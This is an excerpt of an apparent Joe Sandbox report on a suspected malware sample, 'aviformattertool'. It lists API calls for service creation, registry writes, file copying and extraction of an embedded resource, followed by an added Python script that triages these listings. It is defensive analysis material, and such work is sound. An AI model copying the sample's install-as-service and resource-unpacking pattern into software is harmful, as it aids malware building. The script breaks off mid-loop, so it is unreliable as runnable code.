                                                                                                                                                          • Instruction ID: 6adb909d81279dae7e13fecbb686f1fdb7121ffba9fb2b0a18fd0c77bc900132
                                                                                                                                                          • Opcode Fuzzy Hash: 64bc47f33c90e70bbdf2db1cf44d6d7190741509f106e33f28a2dc8678d8cccb
                                                                                                                                                          • Instruction Fuzzy Hash: BAC04C30844005EBDB056B909F1C67D7E75EB04305F120071E103704A4C7791962AB5E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 128 4026ac-4026ae 130 402630-402632 128->130 131 4026b0 128->131 132 402634 130->132 133 40262c 130->133 134 4026b2-4026b5 131->134 135 4026f8-4026fa 131->135 136 40bbdd RegCloseKey 132->136 133->130 137 4026b6-4026cd 134->137 138 4026a5-4026aa 135->138 139 4026fc-402741 135->139 145 40bbe3 136->145 140 402742-402747 137->140 141 4026cf 137->141 138->128 139->140 140->136 141->137 143 4026d1-4026db 141->143 143->135 145->145
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040BBDD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                          • Opcode ID: 3aeeee875aa4cabdb657a14331ed515f64c60b5e88ed03ae7eeb00348f262562
                                                                                                                                                          • Instruction ID: 0a3fffb35b55b1e01443bd985c00acdcfbb5b69c3c4b678683b7e53cf568a20b
                                                                                                                                                          • Opcode Fuzzy Hash: 3aeeee875aa4cabdb657a14331ed515f64c60b5e88ed03ae7eeb00348f262562
                                                                                                                                                          • Instruction Fuzzy Hash: 2511AFB7500110DFCB22CF50DF8C1EA3BA0FF56350B214477D411AB2D2C37A8553899A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 147 402eae-402ebb 148 402ed2-402ed5 147->148 149 402ebd-402ec3 147->149 150 402f04-402f06 148->150 151 402ed7-402edd 148->151 149->150 152 402ec5-402ece call 403653 149->152 156 402f08-402f0a 150->156 157 402f0b-402f0e 150->157 154 402ee7-402ee9 151->154 155 402edf-402ee5 151->155 152->150 162 402ed0-402ed1 152->162 159 402eea-402ef0 154->159 155->159 156->157 160 402f11-402f1a RtlAllocateHeap 157->160 159->160 163 402ef2-402f00 call 403e00 159->163 161 402f20-402f21 160->161 163->161 166 402f02 163->166 166->160
                                                                                                                                                          APIs
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,00402E92,000000E0,00402E7F,?,00404853,00000100,?,00000000), ref: 00402F1A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 66789356bd00888105a6c91ff4dfb52d8ecebb81d0bee222744b9891a63f8538
                                                                                                                                                          • Instruction ID: 765fdeebac85905f4101f829938394dd68b44c118b6f92374405937e6060d87d
                                                                                                                                                          • Opcode Fuzzy Hash: 66789356bd00888105a6c91ff4dfb52d8ecebb81d0bee222744b9891a63f8538
• Instruction Fuzzy Hash: 08F0F43290422256EA20A714BF887C77364EB107B4F1A0537FE41BB2D0C3B8EC91A2CD
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 167 40b493-40b49b CopyFileA 168 40bb85 167->168 169 40bb8b-40bb8d 168->169 170 4022ef-4022f0 168->170 169->168 173 40b04f 170->173 173->173
APIs
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: 5497bbe63c888b5fcaa9e2707a56c17457b6eaaa9a4369e4f58c60f57812dabb
• Instruction ID: 8d00937566fd4dd7b7edcf529a3ecc8ad7eb961e3f71c3b2ada714d962b661d6
• Opcode Fuzzy Hash: 5497bbe63c888b5fcaa9e2707a56c17457b6eaaa9a4369e4f58c60f57812dabb
• Instruction Fuzzy Hash: CBC09B5018C101EBD15005944E4FF37326CCB54745F2404B73517705DE937C544270AF
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 174 4028fd-40b960 RegCreateKeyExA 176 40b966-40b96b 174->176 177 402558-40b467 174->177 180 402305-40230a 177->180 181 40b46d call 4024d3 177->181 180->177 183 40b472-40b474 181->183 183->177 184 40b47a 183->184
APIs
• RegCreateKeyExA.KERNELBASE(80000002), ref: 0040B958
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 121fb021d3d41a5ac7f9c30e588b87a110767b31ff2458fc081d950d04431ed5
• Instruction ID: 75409721579059e263a434d65e6b8cce5623d5619c58acf15d190f9cebe3b124
• Opcode Fuzzy Hash: 121fb021d3d41a5ac7f9c30e588b87a110767b31ff2458fc081d950d04431ed5
• Instruction Fuzzy Hash: C2C08030544119D6D710D700CE4DBA53374DB00700F100077E316F10C0D3789556D64E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 190 40b212-40b21a OpenSCManagerA 191 40b31f 190->191
APIs
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: ManagerOpen
• String ID:
• API String ID: 1889721586-0
• Opcode ID: 231dc8a31b2bb7b97adb2f343c3c4fc5a072de4af1cab3b9222ceeb4d900e450
• Instruction ID: 32e33916c9bd7d11cb73b576be32e312a731320d9a1ae7e3a76c3e751fdee998
• Opcode Fuzzy Hash: 231dc8a31b2bb7b97adb2f343c3c4fc5a072de4af1cab3b9222ceeb4d900e450
• Instruction Fuzzy Hash: B2B01130808002EEC3008F208A8802C3AA2A280302B300C3AC203FA2E0C3B80082AE2E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 192 40b008-40b00e CreateDirectoryA
APIs
• CreateDirectoryA.KERNELBASE ref: 0040B008
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: CreateDirectory
• String ID:
• API String ID: 4241100979-0
• Opcode ID: 2ee1b2209c7d92f0295a037889c2828dae7207670e9894e8d228c9cf7201a81b
• Instruction ID: ca426ecc0cec97c259be826b783d1f9562bd1de7f412ed967c6160a887a1dc29
• Opcode Fuzzy Hash: 2ee1b2209c7d92f0295a037889c2828dae7207670e9894e8d228c9cf7201a81b
• Instruction Fuzzy Hash: 74900225588150E6D10056585B0D5153574590474272181B37203B14D145FE10525A1F
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateServiceA.ADVAPI32 ref: 0040259B
• CloseServiceHandle.ADVAPI32(00000000), ref: 0040B489
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: Service$CloseCreateHandle
• String ID:
• API String ID: 1873643653-0
• Opcode ID: 87860bdca3a9e3488cb9bedef154d4cd967a6912ce68fa88749aba91491c2137
• Instruction ID: 156b1c4766efdc2507a1250fa3a0c7a8bcc478032e34b94fdbef6a3f91d5aa9f
• Opcode Fuzzy Hash: 87860bdca3a9e3488cb9bedef154d4cd967a6912ce68fa88749aba91491c2137
• Instruction Fuzzy Hash: 80C01230844018EACF144F508C5441E3E35D640310F118472D402765A0C3395E65BEDD
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(JSON Nested Objects 66,Function_0000235E), ref: 004023C1
• SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402420
• GetLastError.KERNEL32 ref: 00402422
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
• GetLastError.KERNEL32 ref: 00402450
• SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402480
• CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
• CloseHandle.KERNEL32 ref: 004024A1
• SetServiceStatus.ADVAPI32(0040A0A8), ref: 004024CA
Strings
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
• String ID: JSON Nested Objects 66
• API String ID: 3346042915-4184186574
• Opcode ID: b8e2ceea582d5224d868d550000be66c6421262dea17db8a57385ad066ca7869
• Instruction ID: b1e04a5d4e7bd3d275470c836a5b4936d2fee142cab1bdbbff56863c8edf9318
• Opcode Fuzzy Hash: b8e2ceea582d5224d868d550000be66c6421262dea17db8a57385ad066ca7869
• Instruction Fuzzy Hash: 4921E470855348AFD2109F16EF48A16BEA9EB95755711413AE105B22B0C7BA0028CF2E
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
Strings
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
• API String ID: 2238633743-4044615076
• Opcode ID: 5e55bbd5d9fbbd31eb644cb3db4451ccecd799ed23d920ffe44c979ddb298174
• Instruction ID: 96757171791ba6acfa1a588329da0afe6fa494a71d71fef51203d82f368b70d2
• Opcode Fuzzy Hash: 5e55bbd5d9fbbd31eb644cb3db4451ccecd799ed23d920ffe44c979ddb298174
• Instruction Fuzzy Hash: 92012532600711AFCB11AFB5AD84A1B3FE8EB48750715443AFD05F2291D678D8359F6D
Uniqueness

Uniqueness Score: -1.00%

APIs
• LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
• LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
• LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
• MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
• LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
• LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
• LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: String$ByteCharMultiWide
• String ID:
• API String ID: 352835431-0
• Opcode ID: 5ddbac4b75e33bff4f019730f37dd77ec854adadffa24fffe04afa75f44fdc89
• Instruction ID: 6c7c4d56f82388bc32b1a747b53f9b53fb7dea99d84d03387e69c39b219b6625
• Opcode Fuzzy Hash: 5ddbac4b75e33bff4f019730f37dd77ec854adadffa24fffe04afa75f44fdc89
                                                                                                                                                          • Instruction Fuzzy Hash: FD516931500609AFDF228F94CD45EAF7FB9EB48744F10412AF916B12A0D3399D61DF69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
• GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
• WriteFile.KERNEL32(00000000), ref: 00404D43
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
• Opcode ID: 87626977ec5ba82154c16f7a1181adbf3904f853169ea05d33f0388251de275b
• Instruction ID: 15dac176226125f9b152d138cffbac045ff90c6308279214c289240873c3895a
• Opcode Fuzzy Hash: 87626977ec5ba82154c16f7a1181adbf3904f853169ea05d33f0388251de275b
• Instruction Fuzzy Hash: A731C5B2A012186FEF20E761DE49FDA336CEF81304F1105BBF945B61C0E6B89A548A19
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
• FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide
• String ID:
• API String ID: 1823725401-0
• Opcode ID: 36565b9f5b822e68e5d6287e9a487bd93639a030c9873021641afaf6e7ba0288
• Instruction ID: 43c9d50b8e904b77a3a1cd3ef8b41512f2ebbfa3913c6b8dbecc9c9b9a691504
• Opcode Fuzzy Hash: 36565b9f5b822e68e5d6287e9a487bd93639a030c9873021641afaf6e7ba0288
• Instruction Fuzzy Hash: 0A3102F75442616FD7207FB99C8883BB69CE6C6358712493BFB42F3280D7798C4182A9
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
• GetLastError.KERNEL32 ref: 00401F86
• SizeofResource.KERNEL32(00000000), ref: 00401F93
• LoadResource.KERNEL32(00000000), ref: 00401FAD
• LockResource.KERNEL32(00000000), ref: 00401FB4
• GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
• GetTickCount.KERNEL32 ref: 00401FFB
• GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
• String ID:
• API String ID: 564119183-0
• Opcode ID: beb4d93e6ab0000654ca0b4ef6e0369b4b44b9707bf6409794ee70763ef4fb7e
• Instruction ID: 463a3d7b41c8cda22d33258f608925a12b9792281116504224950c64902584c3
• Opcode Fuzzy Hash: beb4d93e6ab0000654ca0b4ef6e0369b4b44b9707bf6409794ee70763ef4fb7e
• Instruction Fuzzy Hash: 48315B31A40251AFDB109FB99E489AF7B78EF45344F10807AFE46F7291D6748941C7A8
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
• GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
• GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
• MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
• GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: StringType$ByteCharMultiWide
• String ID:
• API String ID: 3852931651-0
• Opcode ID: 9ae0dc97d2ed4bc325ef346dcbaa1dfa56a56ee49ac91c7797361c074a205c54
• Instruction ID: 92337b5d5261d1f7514e6591bcc0141c6486a35b2866982676c545ec12be9aca
• Opcode Fuzzy Hash: 9ae0dc97d2ed4bc325ef346dcbaa1dfa56a56ee49ac91c7797361c074a205c54
• Instruction Fuzzy Hash: B1416C72540619AFCF109FA4DD85AAF3B69EB08710F10443AF912F2290C3399A619BA9
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetVersionExA.KERNEL32 ref: 00403131
• GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: EnvironmentFileModuleNameVariableVersion
• String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
• API String ID: 1385375860-4131005785
• Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
• Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
• Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
• Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStartupInfoA.KERNEL32(?), ref: 0040489B
• GetFileType.KERNEL32(00000800), ref: 00404941
• GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
• GetFileType.KERNEL32(00000000), ref: 004049A8
• SetHandleCount.KERNEL32 ref: 004049DF
Memory Dump Source
• Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
Similarity
• API ID: FileHandleType$CountInfoStartup
• String ID:
• API String ID: 1710529072-0
• Opcode ID: 98b932809ab249fb6d2b1e7eb3a8536e99f5defad770c06167dc9539152dd1ea
• Instruction ID: 8fe4441db6cd525bc9d87713bb4edde2cd7c7f14dbffc3b3aa205102a4a4cd07
• Opcode Fuzzy Hash: 98b932809ab249fb6d2b1e7eb3a8536e99f5defad770c06167dc9539152dd1ea
• Instruction Fuzzy Hash: 2B5113F26003118BD7208B38CD48B673BA0BB91320F19473AE696FB2E1D73C8855C75A
Uniqueness
Uniqueness Score: -1.00%
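
Most of the function records in this part of the report are Visual C++ runtime start-up helpers (locale conversion, environment-block copy, heap selection, stdio handle init, the "Runtime Error!" banner), which the strings "Microsoft Visual C++ Runtime Library" and "__MSVCRT_HEAP_SELECT" above support; the record that deserves attention is the FindResourceA(type 0xA = RT_RCDATA) -> SizeofResource -> LoadResource -> LockResource -> GlobalAlloc(GMEM_ZEROINIT) chain, which reads an embedded RCDATA blob into a fresh buffer. The following Python script is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the "APIs" lines exactly as the report prints them, decodes a few Win32 constants, and labels each record. The RECORDS list is copied verbatim from the report (the resource record, the runtime-error banner record, the stdio-init record above, and the HeapAlloc/VirtualAlloc record that follows); the rule table, its labels, the functions `triage`, `base_name`, `parse_arg` and `flags`, and the reading of GetStdHandle's argument as the low byte of a negative DWORD are this example's own assumptions, and the CRT attributions are an analyst's reading to be confirmed in the disassembly, since the argument columns in these listings are best-effort stack reads.

```python
"""Triage of Joe Sandbox per-function "APIs" listings (added example, not report code)."""
import re

# Four records copied verbatim from the report; the grouping into records and
# the classification rules further down are this example's own assumptions.
RECORDS = [
    """• FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
       • GetLastError.KERNEL32 ref: 00401F86
       • SizeofResource.KERNEL32(00000000), ref: 00401F93
       • LoadResource.KERNEL32(00000000), ref: 00401FAD
       • LockResource.KERNEL32(00000000), ref: 00401FB4
       • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
       • GetTickCount.KERNEL32 ref: 00401FFB
       • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061""",
    """• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
       • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
       • WriteFile.KERNEL32(00000000), ref: 00404D43""",
    """• GetStartupInfoA.KERNEL32(?), ref: 0040489B
       • GetFileType.KERNEL32(00000800), ref: 00404941
       • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
       • GetFileType.KERNEL32(00000000), ref: 004049A8
       • SetHandleCount.KERNEL32 ref: 004049DF""",
    """• HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
       • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
       • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
       • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
       • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F""",
]

# "• Api.MODULE(arg,...), ref: ADDR" or "• Api.MODULE ref: ADDR", as the report prints them.
LINE = re.compile(r"•?\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

def parse_arg(tok):
    """8-hex-digit argument -> int; '?' and string literals -> None.
    A leading '-' is dropped: assumption that the report prints the low byte of negative DWORDs."""
    m = re.fullmatch(r"-?([0-9A-Fa-f]{8})", tok.strip())
    return int(m.group(1), 16) if m else None

def base_name(api):
    """Strip the ANSI/Unicode suffix so LCMapStringA/W match as one API."""
    return api[:-1] if len(api) > 2 and api[-1] in "AW" and api[-2].islower() else api

def flags(table):
    return lambda v: "|".join(n for bit, n in table.items() if v & bit) or None

RT_TYPES = {2: "RT_BITMAP", 3: "RT_ICON", 10: "RT_RCDATA", 14: "RT_GROUP_ICON", 24: "RT_MANIFEST"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
STD_HANDLES = {0xF6: "STD_INPUT_HANDLE", 0xF5: "STD_OUTPUT_HANDLE", 0xF4: "STD_ERROR_HANDLE"}  # low byte of -10/-11/-12
DECODERS = {  # (API without A/W, argument index) -> human-readable constant
    ("FindResource", 1): RT_TYPES.get,
    ("GlobalAlloc", 0): flags({0x02: "GMEM_MOVEABLE", 0x40: "GMEM_ZEROINIT"}),
    ("VirtualAlloc", 2): flags({0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}),
    ("VirtualAlloc", 3): PAGE_PROT.get,
    ("VirtualFree", 2): flags({0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}),
    ("GetStdHandle", 0): lambda v: STD_HANDLES.get(v & 0xFF),
}

# First rule whose API set is contained in the record wins.  The CRT labels are
# this example's reading of the MSVC runtime start-up helpers; confirm them in IDA.
RULES = [
    ("embedded resource copied to a fresh buffer: reverse this one", {"FindResource", "LoadResource", "LockResource"}),
    ("CRT runtime-error banner to stderr (library code)", {"GetModuleFileName", "GetStdHandle", "WriteFile"}),
    ("CRT environment block setup (library code)", {"GetEnvironmentStrings", "FreeEnvironmentStrings"}),
    ("CRT locale / code-page conversion (library code)", {"LCMapString"}),
    ("CRT locale / code-page conversion (library code)", {"GetStringType"}),
    ("CRT heap selection at startup (library code)", {"GetVersionEx", "GetEnvironmentVariable"}),
    ("CRT stdio handle table init (library code)", {"GetStartupInfo", "GetFileType", "SetHandleCount"}),
    ("region reserve/commit: check flProtect for executable pages", {"VirtualAlloc"}),
]

def triage(records):
    """Return {ref of first call: (label, [decoded-constant notes])} per record."""
    out = {}
    for rec in records:
        calls = [m for m in (LINE.match(l.strip()) for l in rec.splitlines()) if m]
        if not calls:
            continue
        apis = {base_name(m["api"]) for m in calls}
        label = next((lab for lab, need in RULES if need <= apis), "unclassified: read it")
        notes = []
        for m in calls:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            for i, v in enumerate(args):
                dec = DECODERS.get((base_name(m["api"]), i))
                if v is not None and dec and dec(v):
                    notes.append(f"{m['api']}@{m['ref']} arg{i}=0x{v:X} {dec(v)}")
        out[calls[0]["ref"]] = (label, notes)
    return out

if __name__ == "__main__":
    for ref, (label, notes) in triage(RECORDS).items():
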